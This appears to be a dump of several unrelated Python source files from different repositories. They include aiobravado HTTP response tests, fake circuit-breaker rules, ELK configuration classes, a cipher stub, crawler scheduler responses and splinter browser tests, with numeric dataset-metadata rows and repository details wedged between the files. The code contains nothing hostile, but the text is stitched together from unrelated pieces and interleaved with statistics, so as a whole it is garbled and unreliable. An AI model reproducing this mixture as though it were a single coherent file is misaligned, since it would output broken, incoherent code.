def test_2XX_matching_response_not_found_in_spec(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse, status_code=200)
    operation = Mock(spec=Operation)
    with pytest.raises(HTTPError) as excinfo:
        event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
    assert excinfo.value.response.status_code == 200
    assert excinfo.value.message == 'boo'


@patch('aiobravado.http_future.unmarshal_response_inner',
       side_effect=MatchingResponseNotFound)
def test_4XX_matching_response_not_found_in_spec(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse, status_code=404)
    operation = Mock(spec=Operation)
    with pytest.raises(HTTPError) as excinfo:
        event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
    assert excinfo.value.response.status_code == 404


@patch(
    'aiobravado.http_future.unmarshal_response_inner',
    new_callable=partial(unmarshal_response_inner_factory, {'msg': 'Not found'})
)
def test_4XX(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse, status_code=404)
    operation = Mock(spec=Operation)
    with pytest.raises(HTTPError) as excinfo:
        event_loop.run_until_complete(unmarshal_response(incoming_response, operation))
    assert excinfo.value.response.status_code == 404
    assert excinfo.value.swagger_result == {'msg': 'Not found'}


@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_response_callbacks_executed_on_happy_path(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse)
    incoming_response.status_code = 200
    operation = Mock(spec=Operation)
    callback = Mock()
    event_loop.run_until_complete(
        unmarshal_response(incoming_response, operation, response_callbacks=[callback])
    )
    assert incoming_response.swagger_result == 99
    assert callback.call_count == 1


@patch('aiobravado.http_future.unmarshal_response_inner', new_callable=partial(unmarshal_response_inner_factory, 99))
def test_response_callbacks_executed_on_failure(_1, event_loop):
    incoming_response = Mock(spec=IncomingResponse, status_code=404)
    operation = Mock(spec=Operation)
    callback = Mock()
    with pytest.raises(HTTPError) as excinfo:
        event_loop.run_until_complete(
            unmarshal_response(incoming_response, operation, response_callbacks=[callback])
        )
    assert excinfo.value.response.status_code == 404
    assert callback.call_count == 1
| 40.5 | 117 | 0.785494 | 477 | 3,888 | 6.083857 | 0.159329 | 0.111303 | 0.083391 | 0.060303 | 0.813232 | 0.798759 | 0.769125 | 0.768091 | 0.752584 | 0.732254 | 0 | 0.017741 | 0.130144 | 3,888 | 95 | 118 | 40.926316 | 0.840331 | 0.005401 | 0 | 0.552632 | 0 | 0 | 0.080724 | 0.072962 | 0 | 0 | 0 | 0 | 0.144737 | 1 | 0.105263 | false | 0 | 0.118421 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d8bd96fc0109a56ed7c9c977bd1aaab9a48a08e8 | 1,076 | py | Python | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 14 | 2016-07-25T19:29:05.000Z | 2021-12-10T19:12:37.000Z | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 37 | 2016-07-22T12:28:02.000Z | 2021-03-19T21:52:39.000Z | tests/fake/fallbacks/circuit_breaker/rules.py | rafaelgotts/django-toolkit | 10b68cbb326bdbc8c2d9efda5edbfc7768476a72 | [
"MIT"
] | 8 | 2016-10-05T13:02:32.000Z | 2020-08-02T12:59:08.000Z | # -*- coding: utf-8 -*-
from django_toolkit.fallbacks.circuit_breaker.rules import Rule


class FakeRuleShouldOpen(Rule):
    def should_open_circuit(self, total_failures, total_requests):
        return True

    def log_increase_failures(self, total_failures, total_requests):
        pass


class FakeRuleShouldNotOpen(Rule):
    def should_open_circuit(self, total_failures, total_requests):
        return False

    def log_increase_failures(self, total_failures, total_requests):
        pass


class FakeRuleShouldNotIncreaseFailure(Rule):
    def should_increase_failure_count(self):
        return False

    def should_open_circuit(self, total_failures, total_requests):
        return False

    def log_increase_failures(self, total_failures, total_requests):
        pass


class FakeRuleShouldNotIncreaseRequest(Rule):
    def should_increase_request_count(self):
        return False

    def should_open_circuit(self, total_failures, total_requests):
        return False

    def log_increase_failures(self, total_failures, total_requests):
        pass
| 23.911111 | 68 | 0.742565 | 124 | 1,076 | 6.120968 | 0.266129 | 0.094862 | 0.179183 | 0.231884 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0.693017 | 0 | 0.001151 | 0.192379 | 1,076 | 44 | 69 | 24.454545 | 0.872267 | 0.019517 | 0 | 0.68 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.16 | 0.04 | 0.24 | 0.84 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
2b4a70b0fbf208abe80c129e59068241a5c0dbb7 | 2,289 | py | Python | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 6 | 2020-03-06T16:13:08.000Z | 2022-03-09T07:53:34.000Z | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-10-02T02:23:08.000Z | 2021-11-08T13:29:37.000Z | pymatflow/elk/base/math.py | DeqiTang/pymatflow | bd8776feb40ecef0e6704ee898d9f42ded3b0186 | [
"MIT"
] | 1 | 2021-07-10T16:28:14.000Z | 2021-07-10T16:28:14.000Z |
class rootsolver:
    """
    """
    def __init__(self):
        self.params = {}

    def to_string(self):
        out = ""
        for item in self.params:
            if self.params[item] == None:
                continue
            out += "%s = %s\n" % (item, self.params[item])
        out += "\n"
        return out

    def set_params(self, params):
        """
        """
        for item in params:
            if len(item.split("/")) == 3:
                self.params[item.split("/")[-1]] = params[item]
                continue


class sparskit:
    """
    """
    def __init__(self):
        self.params = {}

    def to_string(self):
        out = ""
        for item in self.params:
            if self.params[item] == None:
                continue
            out += "%s = %s\n" % (item, self.params[item])
        out += "\n"
        return out

    def set_params(self, params):
        """
        """
        for item in params:
            if len(item.split("/")) == 3:
                self.params[item.split("/")[-1]] = params[item]
                continue


class math:
    """
    """
    def __init__(self):
        self.params = {}
        self.rootsolver = rootsolver()
        self.sparskit = sparskit()

    def to_string(self):
        out = ""
        for item in self.params:
            if self.params[item] == None:
                continue
            out += "%s = %s\n" % (item, self.params[item])
        out += "\n"
        out += self.rootsolver.to_string()
        out += self.sparskit.to_string()
        return out

    def set_params(self, params):
        """
        """
        for item in params:
            if len(item.split("/")) == 2:
                self.params[item.split("/")[-1]] = params[item]
                continue
            if item.split("/")[1] == "RootSolver":
                self.rootsolver.set_params({item: params[item]})
            elif item.split("/")[1] == "SPARSKIT":
                self.sparskit.set_params({item: params[item]})
            else:
                pass
| 27.578313 | 65 | 0.399301 | 213 | 2,289 | 4.187793 | 0.13615 | 0.201794 | 0.141256 | 0.050448 | 0.778027 | 0.702915 | 0.702915 | 0.702915 | 0.660314 | 0.660314 | 0 | 0.006483 | 0.4609 | 2,289 | 83 | 66 | 27.578313 | 0.71637 | 0 | 0 | 0.758621 | 0 | 0 | 0.027713 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0.017241 | 0 | 0 | 0.258621 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
995f24d84ef6642c4bd25a93d39921feb91b1bcd | 84 | py | Python | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
] | 1,177 | 2017-06-21T20:24:06.000Z | 2022-03-29T02:30:55.000Z | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
] | 1,890 | 2017-06-18T20:06:10.000Z | 2022-03-31T18:35:51.000Z | exercises/rail-fence-cipher/rail_fence_cipher.py | kishankj/python | 82042de746128127502e109111e6c4e8ab002af6 | [
"MIT"
] | 1,095 | 2017-06-26T23:06:19.000Z | 2022-03-29T03:25:38.000Z | def encode(message, rails):
pass


def decode(encoded_message, rails):
pass
| 12 | 35 | 0.690476 | 11 | 84 | 5.181818 | 0.636364 | 0.421053 | 0.561404 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 84 | 6 | 36 | 14 | 0.863636 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
998dc126363b109b7d1a5f04e481dd5f751d2f0a | 74 | py | Python | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | app/forms.py | leni1/points-accrual | 5f93ab86cc824d7c8e99eb9d87ce2d528f03c075 | [
"BSD-3-Clause"
] | null | null | null | from django import forms


class ExpenseRequestForm(forms.Form):
pass
| 12.333333 | 37 | 0.77027 | 9 | 74 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175676 | 74 | 5 | 38 | 14.8 | 0.934426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
511381d36b9c87e015b8ba801a8ccaf99655f3ce | 39 | py | Python | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 3 | 2021-12-19T03:17:54.000Z | 2022-02-24T10:29:25.000Z | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 60 | 2021-10-30T12:12:39.000Z | 2022-03-28T07:24:38.000Z | fhir_kindling/serde/__init__.py | migraf/fhir-kindling | 2a3c00ba261a629f58b2408bbff18080ec08b069 | [
"MIT"
] | 1 | 2022-02-24T11:06:48.000Z | 2022-02-24T11:06:48.000Z | from .csv_parser import flatten_bundle
| 19.5 | 38 | 0.871795 | 6 | 39 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102564 | 39 | 1 | 39 | 39 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
51366f09604e2ff0a0c804a53075e5200092b1da | 70 | py | Python | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 3 | 2021-01-22T20:42:31.000Z | 2021-06-02T17:53:19.000Z | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 331 | 2017-11-13T22:41:56.000Z | 2021-12-02T21:59:43.000Z | tests/expectations/mr-x-mr-explicit-order.py | Crunch-io/crunch-cube | 80986d5b2106c774f05176fb6c6a5ea0d840f09d | [
"MIT"
] | 1 | 2021-02-19T02:49:00.000Z | 2021-02-19T02:49:00.000Z | [[3, 22, 8, 22], [45, 3, 12, 45], [12, 8, 86, 86], [45, 22, 86, 130]]
| 35 | 69 | 0.414286 | 16 | 70 | 1.8125 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.537037 | 0.228571 | 70 | 1 | 70 | 70 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5a8d304bb0e580cfcad7bb586d37b65a2381fbdf | 7,310 | py | Python | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 9 | 2020-04-23T14:22:48.000Z | 2022-02-25T21:35:05.000Z | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 42 | 2020-04-24T17:59:33.000Z | 2022-02-16T01:09:23.000Z | crawler/crawler/treewalk/scheduler/responses.py | amosproj/amos-ss2020-metadata-hub | f8434b27b306332c117a8dd20a8a55a3104d0f89 | [
"MIT"
] | 2 | 2020-08-17T11:19:44.000Z | 2021-04-30T08:32:05.000Z | """This module contains the responses coming from the scheduler."""

# Local imports
import crawler.communication as communication


def respond_config_already_present(identifier: str) -> None:
    """Respond that the config is already present in the schedule.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    Args:
        identifier (str): identifier of the configuration

    """
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'is already present in the schedule, thus it was not added.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
communication.scheduler_queue_output.put(response)


def respond_config_inserted(identifier: str, success: bool) -> None:
    """Respond that the config was inserted in the database.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the insertion succeeded or failed.

    Args:
        identifier (str): identifier of the configuration
        success (bool): insertion succeeded/failed

    """
if success:
response = communication.Response(
success=True,
message=(
f'Configuration with identifier {identifier} '
f'was successfully added to the schedule.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
else:
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'wasn\'t added to the schedule due to an internal error.'
),
command=communication.SCHEDULER_ADD_CONFIG
)
communication.scheduler_queue_output.put(response)


def respond_config_deleted(identifier: str, success: bool) -> None:
    """Respond that the config was deleted from the database.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the deletion succeeded or failed.

    Args:
        identifier (str): identifier of the configuration
        success (bool): insertion succeeded/failed

    """
if success:
response = communication.Response(
success=True,
message=(
f'Configuration with identifier {identifier} '
f'was successfully deleted from the schedule.'
),
command=communication.SCHEDULER_REMOVE_CONFIG
)
else:
response = communication.Response(
success=False,
message=(
f'Configuration with identifier {identifier} '
f'wasn\'t deleted from the schedule (not present).'
),
command=communication.SCHEDULER_REMOVE_CONFIG
)
communication.scheduler_queue_output.put(response)


def respond_schedule(schedule: dict) -> None:
    """Respond the TreeWalk schedule.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the schedule could be read.

    Args:
        schedule (dict): schedule

    """
if schedule is None:
response = communication.Response(
success=False,
message='Unable to read schedule.',
command=communication.SCHEDULER_GET_SCHEDULE
)
else:
response = communication.Response(
success=True,
message=schedule,
command=communication.SCHEDULER_GET_SCHEDULE
)
communication.scheduler_queue_output.put(response)


def respond_interval_overlaps(identifier: str) -> None:
    """Respond that the interval overlaps with an already existing one.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    Args:
        identifier (str): identifier of the interval

    """
response = communication.Response(
success=False,
message=(f'Interval with identifier {identifier} is overlapping.'),
command=communication.SCHEDULER_ADD_INTERVAL
)
communication.scheduler_queue_output.put(response)


def respond_interval_inserted(identifier: str, success: bool) -> None:
    """Respond that the interval was inserted in the database.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the insertion succeeded or failed.

    Args:
        identifier (str): identifier of the interval
        success (bool): insertion succeeded/failed

    """
if success:
response = communication.Response(
success=True,
message=(
f'Interval with identifier {identifier} '
f'was successfully added.'
),
command=communication.SCHEDULER_ADD_INTERVAL
)
else:
response = communication.Response(
success=False,
message=(
f'Interval with identifier {identifier} '
f'wasn\'t added to the database due to an internal error.'
),
command=communication.SCHEDULER_ADD_INTERVAL
)
communication.scheduler_queue_output.put(response)


def respond_interval_deleted(identifier: str, success: bool) -> None:
    """Respond that the interval was deleted from the database.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the deletion succeeded or failed.

    Args:
        identifier (str): identifier of the interval
        success (bool): insertion succeeded/failed

    """
if success:
response = communication.Response(
success=True,
message=(
f'Interval with identifier {identifier} '
f'was successfully deleted from the database.'
),
command=communication.SCHEDULER_REMOVE_INTERVAL
)
else:
response = communication.Response(
success=False,
message=(
f'Interval with identifier {identifier} '
f'wasn\'t deleted from the database because it wasn\' present.'
),
command=communication.SCHEDULER_REMOVE_INTERVAL
)
communication.scheduler_queue_output.put(response)


def respond_intervals(intervals: dict) -> None:
    """Respond the intervals.

    This function creates a corresponding response object and inserts it
    in the scheduler output queue.

    The response depends on whether the intervals could be read.

    Args:
        intervals (dict): intervals

    """
if intervals is None:
response = communication.Response(
success=False,
message='Unable to read intervals.',
command=communication.SCHEDULER_GET_INTERVALS
)
else:
response = communication.Response(
success=True,
message=intervals,
command=communication.SCHEDULER_GET_INTERVALS
)
communication.scheduler_queue_output.put(response)
| 31.921397 | 79 | 0.646512 | 753 | 7,310 | 6.197875 | 0.11421 | 0.103707 | 0.086994 | 0.107992 | 0.911078 | 0.856225 | 0.780801 | 0.752303 | 0.752303 | 0.681594 | 0 | 0 | 0.288646 | 7,310 | 228 | 80 | 32.061404 | 0.8975 | 0.308071 | 0 | 0.690476 | 0 | 0 | 0.146789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063492 | false | 0 | 0.007937 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5ad422ecaa5acdaa32cd265aee26a9d83bb32465 | 2,502 | py | Python | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | tests/test_async_finder.py | alialdakheel/splinter | b4c48dc0af9ef98d7d9268f42f4d31a51e65fd68 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.

from .base import supported_browsers
from .fake_webapp import EXAMPLE_APP

import pytest


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_css_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_css(".async-element", wait_time=10)
    assert 1 == len(elements)


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_xpath_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_xpath("//h4", wait_time=10)
    assert 1 == len(elements)


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_tag_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_tag("h4", wait_time=10)
    assert 1 == len(elements)


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_id_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_id("async-header", wait_time=10)
    assert 1 == len(elements)


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_name_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_name("async-input", wait_time=10)
    assert 1 == len(elements)


@pytest.mark.parametrize('browser_name', supported_browsers)
def test_find_by_value_should_found_an_async_element(get_new_browser, browser_name):
    browser = get_new_browser(browser_name)
    browser.visit(EXAMPLE_APP)

    browser.find_by_css(".add-async-element").click()

    elements = browser.find_by_value("async-header-value", wait_time=10)
    assert 1 == len(elements)
| 32.493506 | 84 | 0.771783 | 366 | 2,502 | 4.907104 | 0.191257 | 0.110245 | 0.08686 | 0.13363 | 0.834076 | 0.834076 | 0.834076 | 0.818486 | 0.818486 | 0.818486 | 0 | 0.011348 | 0.119504 | 2,502 | 76 | 85 | 32.921053 | 0.803904 | 0.069145 | 0 | 0.666667 | 0 | 0 | 0.103701 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
51f4cdeb23017006192cd46d4b798aee037c8bd8 | 25 | py | Python | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | 1 | 2021-08-06T21:56:52.000Z | 2021-08-06T21:56:52.000Z | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | null | null | null | chadlib/collection/__init__.py | cjreynol/chadlib | e417a6c5b100b7124a7d9b61d0120b3caa897bb8 | [
"MIT"
] | null | null | null | from .stack import Stack
| 12.5 | 24 | 0.8 | 4 | 25 | 5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cfcfebd134e39a6d1f7d24e787d043e219d5b351 | 133 | py | Python | communicode/__init__.py | thomashancock/CommuniCode-old-for-presentation | a21746ba70ead268ff31f03016f4889b765bf4af | [
"MIT"
] | null | null | null | communicode/__init__.py | thomashancock/CommuniCode-old-for-presentation | a21746ba70ead268ff31f03016f4889b765bf4af | [
"MIT"
] | 1 | 2015-08-03T08:56:02.000Z | 2015-08-24T17:25:56.000Z | communicode/__init__.py | FrejaThoresen/CommuniCode | 509f7062238a53ff96d137f5b07111de2c61639d | [
"MIT"
] | null | null | null | import gitlab
from django.conf import settings
git = gitlab.Gitlab(settings.SECRET_GITLAB_HOST, token=settings.SECRET_GITLAB_TOKEN)
| 26.6 | 84 | 0.849624 | 19 | 133 | 5.736842 | 0.526316 | 0.256881 | 0.366972 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.082707 | 133 | 4 | 85 | 33.25 | 0.893443 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3200d2b5bcd54c5dee257a42a44850c248d1f0dc | 102 | py | Python | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 28 | 2020-12-13T23:37:11.000Z | 2022-03-31T02:01:34.000Z | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 7 | 2021-03-01T15:24:15.000Z | 2022-02-27T03:38:54.000Z | chessdotcom/__init__.py | Phalanthus/chess.com | 9d5b722035c502146354a51d6ab7735cdc88ccfa | [
"MIT"
] | 2 | 2020-06-25T13:16:18.000Z | 2020-06-25T21:42:50.000Z | from chessdotcom.types import ChessDotComError, ChessDotComResponse
from chessdotcom.client import *
| 25.5 | 67 | 0.862745 | 10 | 102 | 8.8 | 0.7 | 0.340909 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098039 | 102 | 3 | 68 | 34 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5c6a52e623a3fc0381f14de5394f9e21d84ede20 | 76 | py | Python | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | schpf/__init__.py | mag1pie/scHPF | 926f8831b4167ad877572a5e34d1e7d2f729b1c4 | [
"BSD-2-Clause"
] | null | null | null | from .scHPF_ import *
from .util import *
from ._version import __version__
| 19 | 33 | 0.776316 | 10 | 76 | 5.3 | 0.5 | 0.377358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 76 | 3 | 34 | 25.333333 | 0.828125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5cb339014726b852be63e5d06b521682896434e3 | 220 | py | Python | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | 1 | 2019-01-03T06:09:19.000Z | 2019-01-03T06:09:19.000Z | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | null | null | null | src/chemspace/__init__.py | sunoru/VisChemSpace | d30e8e3568ade91a68e6fa299dd67d7fd9166bc4 | [
"MIT"
] | null | null | null | from chemspace.load_data import load_data, load_nmr, load_ir
from chemspace.types import NMRVector, IRVector, SpectrumVector
from chemspace.fingerprints import Fingerprints
from chemspace.graph import ChemicalSpaceGraph
